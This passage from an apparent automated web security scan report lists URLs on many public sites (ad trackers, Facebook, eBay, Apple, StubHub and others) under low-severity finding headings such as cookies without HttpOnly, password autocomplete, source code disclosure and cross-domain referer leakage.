13.36. http://bcp.crwdcntrl.net/4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr

13.37. http://bh.contextweb.com/bh/rtset

13.38. http://bp.specificclick.net/

13.39. http://c.atdmt.com/c.gif

13.40. http://c.bing.com/c.gif

13.41. http://c.microsoft.com/trans_pixel.asp

13.42. http://cdnt.meteorsolutions.com/api/setid

13.43. http://cdnt.meteorsolutions.com/api/track

13.44. http://clk.atdmt.com/goiframe/213439054/340524297/direct/01

13.45. http://clk.specificclick.net/click/v=5

13.46. http://d.agkn.com/pixel!t=650!

13.47. http://ehg-aaa.hitbox.com/HG

13.48. http://g-pixel.invitemedia.com/gmatcher

13.49. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/

13.50. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/

13.51. http://ib.adnxs.com/getuid

13.52. http://ib.adnxs.com/mapuid

13.53. http://ib.adnxs.com/ptj

13.54. http://ib.adnxs.com/px

13.55. http://ib.adnxs.com/pxj

13.56. http://ib.adnxs.com/seg

13.57. http://id.google.com/verify/EAAAAPoodblGem1K2ILpk5pXG1k.gif

13.58. http://id.google.com/verify/EAAAAPqcMfXpe6-gkMVmI3CbcjA.gif

13.59. http://idcs.interclick.com/Segment.aspx

13.60. http://image2.pubmatic.com/AdServer/Pug

13.61. http://images.apple.com/global/nav/scripts/globalnav.js

13.62. http://images.apple.com/global/nav/styles/navigation.css

13.63. http://images.apple.com/global/scripts/apple_core.js

13.64. http://images.apple.com/global/scripts/browserdetect.js

13.65. http://images.apple.com/global/scripts/content_swap.js

13.66. http://images.apple.com/global/scripts/lib/event_mixins.js

13.67. http://images.apple.com/global/scripts/lib/prototype.js

13.68. http://images.apple.com/global/scripts/lib/scriptaculous.js

13.69. http://images.apple.com/global/scripts/overlay_panel.js

13.70. http://images.apple.com/global/scripts/search_decorator.js

13.71. http://images.apple.com/global/scripts/swap_view.js

13.72. http://images.apple.com/global/scripts/view_master_tracker.js

13.73. http://images.apple.com/macpro/scripts/pagenav.js

13.74. http://images.apple.com/macpro/scripts/performance.js

13.75. http://js.revsci.net/gateway/gw.js

13.76. http://m.adnxs.com/msftcookiehandler

13.77. http://maps.google.com/maps

13.78. http://media.fastclick.net/w/tre

13.79. http://odb.outbrain.com/utils/get

13.80. http://p.brilig.com/contact/bct

13.81. http://pix04.revsci.net/C07583/b3/0/3/1008211/494237794.js

13.82. http://pix04.revsci.net/D08734/a1/0/3/0.js

13.83. http://pixel.quantserve.com/pixel

13.84. http://pixel.rubiconproject.com/di.php

13.85. http://pixel.rubiconproject.com/tap.php

13.86. http://profile.live.com/badge

13.87. http://r.turn.com/server/pixel.htm

13.88. http://r1-ads.ace.advertising.com/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue

13.89. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977

13.90. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977

13.91. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977

13.92. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977

13.93. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977

13.94. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977

13.95. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977

13.96. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977

13.97. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977

13.98. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977

13.99. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977

13.100. http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

13.101. http://rover.ebay.com/rover/1/711-53200-19255-0/1

13.102. http://rover.ebay.com/roverimp/0/0/14

13.103. http://rover.ebay.com/roversync/

13.104. http://rt.legolas-media.com/lgrt

13.105. http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js

13.106. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/realnetworks-43000165.png

13.107. http://secure.adnxs.com/seg

13.108. http://sitelife.boston.com/ver1.0/Direct/Jsonp

13.109. http://sitelife.boston.com/ver1.0/Stats/Tracker.gif

13.110. http://srx.main.ebayrtm.com/rtm

13.111. https://ssl.bing.com/travel/secure/account/overview

13.112. http://tags.bluekai.com/site/2731

13.113. http://tags.bluekai.com/site/450

13.114. http://tap.rubiconproject.com/oz/feeds/targus/profile

13.115. http://tap.rubiconproject.com/oz/sensor

13.116. http://video.msn.com/services/user/info

13.117. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route

13.118. http://www.burstnet.com/enlightn/7117//930F/

13.119. http://www.burstnet.com/enlightn/7121//7128/

13.120. http://www.burstnet.com/enlightn/7177//7F4D/

13.121. http://www.facebook.com/advertising/

13.122. http://www.facebook.com/ajax/intl/language_dialog.php

13.123. http://www.facebook.com/ajax/prefetch.php

13.124. http://www.facebook.com/badges

13.125. http://www.facebook.com/badges/

13.126. http://www.facebook.com/campaign/landing.php

13.127. http://www.facebook.com/careers/

13.128. http://www.facebook.com/directory/pages/

13.129. http://www.facebook.com/directory/people/

13.130. http://www.facebook.com/facebook

13.131. http://www.facebook.com/find-friends

13.132. http://www.facebook.com/help/

13.133. http://www.facebook.com/mobile

13.134. http://www.facebook.com/mobile/

13.135. http://www.facebook.com/pages/create.php

13.136. http://www.facebook.com/privacy/explanation.php

13.137. http://www.facebook.com/r.php

13.138. http://www.facebook.com/terms.php

13.139. http://www.gamehouse.com/images/subsidiary.png

13.140. http://www.gamestop.com/Recommendations.axd

13.141. http://www.stubhub.com/TeaLeafTarget.html

13.142. http://www.stubhub.com/assets/default.css

13.143. http://www.stubhub.com/content/getPromoContent

13.144. http://www.stubhub.com/favicon.ico

13.145. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml-popup.js

13.146. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml.css

13.147. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-surveydef.js

13.148. http://www.stubhub.com/resources/mojito/img/common/welcome_banner.gif

13.149. http://www.ticketmaster.com/json/menu

13.150. http://www.ticketmaster.com/json/search/genremenu

14. Cookie without HttpOnly flag set

14.1. http://c.microsoft.com/trans_pixel.aspx

14.2. http://investor.realnetworks.com/

14.3. http://investor.realnetworks.com/stockquote.cfm

14.4. http://rac.custhelp.com/

14.5. http://rac.custhelp.com/app/answers/detail/a_id/567/session/L3NpZC9QZkFqRm96aw%3D%3D

14.6. http://real.custhelp.com/app/answers/detail/a_id/9058/session/L3NpZC84dWtpRm96aw%3D%3D

14.7. http://sales.liveperson.net/visitor/addons/deploy.asp

14.8. https://signin.ebay.com/ws/eBayISAPI.dll

14.9. http://superpass.custhelp.com/

14.10. http://superpass.custhelp.com/app/answers/detail/a_id/8866/session/L3NpZC9TeU9pRm96aw%3D%3D

14.11. https://support.discoverbing.com/LTS/default.aspx

14.12. http://support.gamehouse.com/

14.13. http://support.gamehouse.com/app/answers/detail/a_id/861/

14.14. http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D

14.15. http://support.gamehouse.com/app/contact

14.16. http://t.mookie1.com/t/v1/event

14.17. http://www.gamehouse.com/images/subsidiary.png

14.18. http://www.stubhub.com/

14.19. http://a.netmng.com/hic/

14.20. http://a.tribalfusion.com/j.ad

14.21. http://ad.yieldmanager.com/pixel

14.22. http://ad.yieldmanager.com/unpixel

14.23. http://admeld.lucidmedia.com/clicksense/admeld/match

14.24. http://ads.as4x.tmcs.ticketmaster.com/js.ng/site=tm&pagepos=3002&adsize=422x40&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43

14.25. http://ads.as4x.tmcs.ticketmaster.com/js.ng/site=tm&pagepos=3004&adsize=422x30&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43

14.26. http://ads.revsci.net/adserver/ako

14.27. http://ads.undertone.com/fc.php

14.28. http://ads.undertone.com/l

14.29. http://api.choicestream.com/instr/api/8e360375d27a5381/a1

14.30. http://b.scorecardresearch.com/b

14.31. http://b.scorecardresearch.com/p

14.32. http://b.scorecardresearch.com/r

14.33. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02

14.34. http://bcp.crwdcntrl.net/4/c=520|rand=478684930|pv=y|rt=ifr

14.35. http://bcp.crwdcntrl.net/4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr

14.36. http://bcp.crwdcntrl.net/4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr

14.37. http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr

14.38. http://bcp.crwdcntrl.net/4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr

14.39. http://bh.contextweb.com/bh/rtset

14.40. http://bing.com/

14.41. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

14.42. http://bp.specificclick.net/

14.43. http://c.atdmt.com/c.gif

14.44. http://c.bing.com/c.gif

14.45. http://c.microsoft.com/trans_pixel.asp

14.46. http://cdnt.meteorsolutions.com/api/setid

14.47. http://cdnt.meteorsolutions.com/api/track

14.48. http://clk.atdmt.com/goiframe/213439054/340524297/direct/01

14.49. http://clk.specificclick.net/click/v=5

14.50. http://d.agkn.com/pixel!t=650!

14.51. http://de.ign.com/js.ng/size=728x90&network=tpn&property=gamestop&dechannel=gs_home&pagetype=gs_channel

14.52. http://ehg-aaa.hitbox.com/HG

14.53. http://g-pixel.invitemedia.com/gmatcher

14.54. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/

14.55. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/

14.56. http://homepage.mac.com/jstg674/Sites/iSale/Pictures/1310686170_0.jpg

14.57. http://homepage.mac.com/jstg674/Sites/iSale/Pictures/1310686178_1.jpg

14.58. http://idcs.interclick.com/Segment.aspx

14.59. http://image2.pubmatic.com/AdServer/Pug

14.60. http://images.apple.com/global/nav/scripts/globalnav.js

14.61. http://images.apple.com/global/nav/styles/navigation.css

14.62. http://images.apple.com/global/scripts/apple_core.js

14.63. http://images.apple.com/global/scripts/browserdetect.js

14.64. http://images.apple.com/global/scripts/content_swap.js

14.65. http://images.apple.com/global/scripts/lib/event_mixins.js

14.66. http://images.apple.com/global/scripts/lib/prototype.js

14.67. http://images.apple.com/global/scripts/lib/scriptaculous.js

14.68. http://images.apple.com/global/scripts/overlay_panel.js

14.69. http://images.apple.com/global/scripts/search_decorator.js

14.70. http://images.apple.com/global/scripts/swap_view.js

14.71. http://images.apple.com/global/scripts/view_master_tracker.js

14.72. http://images.apple.com/macpro/scripts/pagenav.js

14.73. http://images.apple.com/macpro/scripts/performance.js

14.74. http://internetdc.bnymellon.com/dcscqt3z310000c9vrxqgfz0d_7c2w/dcs.gif

14.75. http://js.revsci.net/gateway/gw.js

14.76. http://lct.salesforce.com/sfga.js

14.77. https://login.live.com/login.srf

14.78. http://m.webtrends.com/dcsk730ac00000w4taqdiehjf_4b7y/dcs.gif

14.79. http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/dcs.gif

14.80. http://majornelson.com/gamercard/index.php

14.81. http://maps.google.com/maps

14.82. http://media.fastclick.net/w/tre

14.83. http://mobileweb.ebay.com/

14.84. http://odb.outbrain.com/utils/get

14.85. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx

14.86. http://onlinehelp.microsoft.com/en-us/bing/ff808415.aspx

14.87. http://onlinehelp.microsoft.com/en-us/bing/ff808465.aspx

14.88. http://onlinehelp.microsoft.com/en-us/bing/ff808483.aspx

14.89. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx

14.90. http://onlinehelp.microsoft.com/en-us/bing/ff808492.aspx

14.91. http://onlinehelp.microsoft.com/en-us/bing/ff808506.aspx

14.92. http://onlinehelp.microsoft.com/en-us/bing/ff808522.aspx

14.93. http://onlinehelp.microsoft.com/en-us/bing/ff919207.aspx

14.94. http://onlinehelp.microsoft.com/en-us/bing/gg276362.aspx

14.95. http://p.brilig.com/contact/bct

14.96. http://pix04.revsci.net/C07583/b3/0/3/1008211/494237794.js

14.97. http://pix04.revsci.net/D08734/a1/0/3/0.js

14.98. http://pixel.quantserve.com/pixel

14.99. http://pixel.rubiconproject.com/di.php

14.100. http://pixel.rubiconproject.com/tap.php

14.101. http://profile.live.com/badge

14.102. http://r.turn.com/server/pixel.htm

14.103. http://r1-ads.ace.advertising.com/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue

14.104. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard

14.105. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977

14.106. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977

14.107. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977

14.108. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977

14.109. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977

14.110. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977

14.111. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977

14.112. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977

14.113. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977

14.114. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977

14.115. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977

14.116. http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

14.117. http://rover.ebay.com/rover/1/711-53200-19255-0/1

14.118. http://rover.ebay.com/roverimp/0/0/14

14.119. http://rover.ebay.com/roversync/

14.120. http://rt.legolas-media.com/lgrt

14.121. http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js

14.122. http://sales.liveperson.net/hc/21661174/

14.123. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/realnetworks-43000165.png

14.124. http://sitelife.boston.com/ver1.0/Direct/Jsonp

14.125. http://sitelife.boston.com/ver1.0/Stats/Tracker.gif

14.126. http://srx.main.ebayrtm.com/rtm

14.127. https://ssl.bing.com/travel/secure/account/overview

14.128. http://statse.webtrendslive.com/dcs2jv4o900000oa88gtwa3au_6v2h/dcs.gif

14.129. https://support.discoverbing.com/Default.aspx

14.130. http://t2.trackalyzer.com/trackalyze.asp

14.131. http://tags.bluekai.com/site/2731

14.132. http://tags.bluekai.com/site/450

14.133. http://tap.rubiconproject.com/oz/feeds/targus/profile

14.134. http://tap.rubiconproject.com/oz/sensor

14.135. http://video.msn.com/services/user/info

14.136. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route

14.137. http://www.adminitrack.com/

14.138. http://www.burstnet.com/enlightn/7117//930F/

14.139. http://www.burstnet.com/enlightn/7121//7128/

14.140. http://www.burstnet.com/enlightn/7177//7F4D/

14.141. http://www.clickmanage.com/events/clickevent.aspx

14.142. http://www.facebook.com/advertising/

14.143. http://www.facebook.com/badges/

14.144. http://www.facebook.com/careers/

14.145. http://www.facebook.com/directory/pages/

14.146. http://www.facebook.com/directory/people/

14.147. http://www.facebook.com/facebook

14.148. http://www.facebook.com/find-friends

14.149. http://www.facebook.com/help/

14.150. http://www.facebook.com/mobile/

14.151. http://www.facebook.com/pages/create.php

14.152. http://www.facebook.com/privacy/explanation.php

14.153. http://www.fansnap.com/

14.154. http://www.fastteks.com.asp1-14.websitetestlink.com/css/styles.css

14.155. http://www.gamestop.com/

14.156. http://www.gamestop.com/Recommendations.axd

14.157. http://www.googleadservices.com/pagead/aclk

14.158. http://www.nne.aaa.com/en-nne/Pages/Home.aspx

14.159. http://www.stubhub.com/TeaLeafTarget.html

14.160. http://www.stubhub.com/assets/default.css

14.161. http://www.stubhub.com/content/getPromoContent

14.162. http://www.stubhub.com/favicon.ico

14.163. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml-popup.js

14.164. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml.css

14.165. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-surveydef.js

14.166. http://www.stubhub.com/resources/mojito/img/common/welcome_banner.gif

14.167. http://www.ticketmaster.com/json/menu

14.168. http://www.ticketmaster.com/json/search/genremenu

15. Password field with autocomplete enabled

15.1. http://digg.com/submit

15.2. http://forum.redbyte.ro/

15.3. http://manager.linode.com/

15.4. https://signin.ebay.com/ws/eBayISAPI.dll

15.5. http://waypointlivingspaces.com/function.mysql-connect

15.6. http://waypointlivingspaces.com/locate-dealer

15.7. http://waypointlivingspaces.com/locate-dealer

15.8. http://waypointlivingspaces.com/locate-dealer

15.9. http://waypointlivingspaces.com/locate-dealer

15.10. http://waypointlivingspaces.com/user

15.11. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

15.12. http://www.facebook.com/advertising/

15.13. http://www.facebook.com/ajax/intl/language_dialog.php

15.14. http://www.facebook.com/badges/

15.15. http://www.facebook.com/careers/

15.16. http://www.facebook.com/directory/pages/

15.17. http://www.facebook.com/directory/people/

15.18. http://www.facebook.com/facebook

15.19. http://www.facebook.com/find-friends

15.20. http://www.facebook.com/help/

15.21. http://www.facebook.com/mobile/

15.22. http://www.facebook.com/pages/create.php

15.23. http://www.facebook.com/privacy/explanation.php

15.24. http://www.facebook.com/r.php

15.25. http://www.facebook.com/r.php

15.26. http://www.facebook.com/terms.php

15.27. http://www.livedrive.com/SignupToLivedrive

15.28. http://www.myspace.com/auth/loginform

15.29. http://www.nne.aaa.com/en-nne/Pages/Home.aspx

16. Source code disclosure

16.1. http://bing.fansnap.com/ejs_templates/seats_page/known_tooltip.ejs

16.2. http://bing.fansnap.com/ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs

16.3. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

16.4. http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundle2.js

16.5. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js

16.6. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

16.7. http://www.seapine.com/ttpro.html

17. ASP.NET debugging enabled

18. Referer-dependent response

18.1. http://bing.fansnap.com/checkout/index/415814268

18.2. http://bing.fansnap.com/checkout/index/418563179

18.3. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

18.4. http://feeds.feedburner.com/netsparker

18.5. http://support.microsoft.com/contactus/cu_sc_prodact_master

18.6. http://support.microsoft.com/gp/csa

18.7. http://vimeo.com/moogaloop.swf

18.8. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route

18.9. http://www.facebook.com/plugins/activity.php

18.10. http://www.facebook.com/plugins/like.php

18.11. http://www.facebook.com/plugins/likebox.php

18.12. http://www.fansnap.com/developers

18.13. http://www.microsoft.com/worldwide/

18.14. http://www.youtube.com/v/JmxL5BlVzZQ

18.15. http://www.youtube.com/v/LpBCsQQ_v0U&autoplay=1

18.16. http://www.youtube.com/v/O3iZU0WCuwc&autoplay=1

18.17. http://www.youtube.com/v/QO6L5AtZ5kE&autoplay=1

18.18. http://www.youtube.com/v/tYy3w4lIafA&autoplay=1

19. Cross-domain POST

19.1. http://www.atlassian.com/software/fisheye/

19.2. http://www.atlassian.com/software/greenhopper/

19.3. http://www.atlassian.com/software/jira/

19.4. http://www.atlassian.com/software/jira/pricing.jsp

19.5. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

19.6. http://www.mavitunasecurity.com/

20. Cross-domain Referer leakage

20.1. http://a.netmng.com/hic/

20.2. http://a.tribalfusion.com/j.ad

20.3. http://a.tribalfusion.com/j.ad

20.4. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127

20.5. http://ad.doubleclick.net/adj/gamesco.gh/home/w

20.6. http://admeld.adnxs.com/usersync

20.7. http://admeld.lucidmedia.com/clicksense/admeld/match

20.8. http://answers.microsoft.com/en-us/Forum/ForumThreadList

20.9. http://answers.microsoft.com/en-us/Site/StartSignIn

20.10. http://answers.microsoft.com/en-us/Site/StartSignIn

20.11. http://answers.microsoft.com/en-us/User/UserThreadList

20.12. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01

20.13. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01

20.14. http://bcp.crwdcntrl.net/px

20.15. http://bing.fansnap.com/checkout/clickout/415814268

20.16. http://bing.fansnap.com/checkout/clickout/418563179

20.17. http://bing.fansnap.com/checkout/clickout/418563179

20.18. http://bing.fansnap.com/checkout/index/415814268

20.19. http://bing.fansnap.com/checkout/index/418563179

20.20. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

20.21. http://bp.specificclick.net/

20.22. http://cache.boston.com/universal/js/twitterwidget.js

20.23. http://cc.bingj.com/cache.aspx

20.24. http://clk.specificclick.net/click/v=5

20.25. http://cm.g.doubleclick.net/pixel

20.26. http://cm.g.doubleclick.net/pixel

20.27. http://cm.g.doubleclick.net/pixel

20.28. http://cm.g.doubleclick.net/pixel

20.29. http://developers.facebook.com/

20.30. http://digg.com/submit

20.31. http://googleads.g.doubleclick.net/pagead/ads

20.32. http://ib.adnxs.com/ptj

20.33. http://ib.adnxs.com/seg

20.34. http://mobile.ebay.com/wp-content/themes/platformpro/js/ticker_twitter.js

20.35. http://pixel.invitemedia.com/admeld_sync

20.36. http://rad.msn.com/ADSAdClient31.dll

20.37. http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

20.38. https://signin.ebay.com/ws/eBayISAPI.dll

20.39. http://srx.main.ebayrtm.com/rtm

20.40. https://support.discoverbing.com/Default.aspx

20.41. http://support.microsoft.com/common/international.aspx

20.42. http://support.microsoft.com/contactus/contact_microsoft_customer_serv

20.43. http://support.microsoft.com/oas/default.aspx

20.44. https://support.microsoft.com/oas/default.aspx

20.45. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228

20.46. http://umfcluj.ro/Detaliu.aspx

20.47. http://umfcluj.ro/lista.aspx

20.48. http://umfcluj.ro/lista.aspx

20.49. http://umfcluj.ro/lista.aspx

20.50. http://umfcluj.ro/lista.aspx

20.51. http://umfcluj.ro/lista.aspx

20.52. http://umfcluj.ro/lista.aspx

20.53. http://umfcluj.ro/search.aspx

20.54. http://waypointlivingspaces.com/locate-dealer

20.55. http://www.adminitrack.com/

20.56. http://www.axosoft.com/lp/ga/bug-tracking-software/

20.57. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

20.58. http://www.clickmanage.com/events/clickevent.aspx

20.59. http://www.discoverbing.com/dbing/community.axd

20.60. http://www.facebook.com/advertising/

20.61. http://www.facebook.com/ajax/intl/language_dialog.php

20.62. http://www.facebook.com/ajax/prefetch.php

20.63. http://www.facebook.com/ajax/prefetch.php

20.64. http://www.facebook.com/badges/

20.65. http://www.facebook.com/careers/

20.66. http://www.facebook.com/find-friends

20.67. http://www.facebook.com/help/

20.68. http://www.facebook.com/mobile/

20.69. http://www.facebook.com/pages/create.php

20.70. http://www.facebook.com/plugins/activity.php

20.71. http://www.facebook.com/plugins/like.php

20.72. http://www.facebook.com/plugins/likebox.php

20.73. http://www.facebook.com/plugins/likebox.php

20.74. http://www.facebook.com/terms.php

20.75. http://www.fastteks.com/TechSolutions/Contact-Us.aspx

20.76. http://www.google.com/search

20.77. http://www.google.com/search

20.78. http://www.google.com/search

20.79. http://www.google.com/search

20.80. http://www.google.com/search

20.81. http://www.google.com/search

20.82. http://www.google.com/url

20.83. http://www.google.com/url

20.84. http://www.googleadservices.com/pagead/conversion/1036609180/

20.85. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

20.86. http://www.livedrive.com/SignupToLivedrive

20.87. http://www.myspace.com/auth/loginform

20.88. http://www.nne.aaa.com/en-nne/Pages/Home.aspx

20.89. http://www.numarasoftware.com/welcome/service_desk.aspx

20.90. http://www.seapine.com/ttpro.html

20.91. http://www.stubhub.com/

20.92. http://www.stumbleupon.com/submit

20.93. http://www.techexcel.com/products/devsuite/devteststudio.html

20.94. http://www.ticketmaster.com/event/000043582C516D43

21. Cross-domain script include

21.1. http://a.netmng.com/hic/

21.2. http://a.tribalfusion.com/j.ad

21.3. http://a.tribalfusion.com/j.ad

21.4. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127

21.5. http://bcp.crwdcntrl.net/px

21.6. http://bing.fansnap.com/checkout/index/415814268

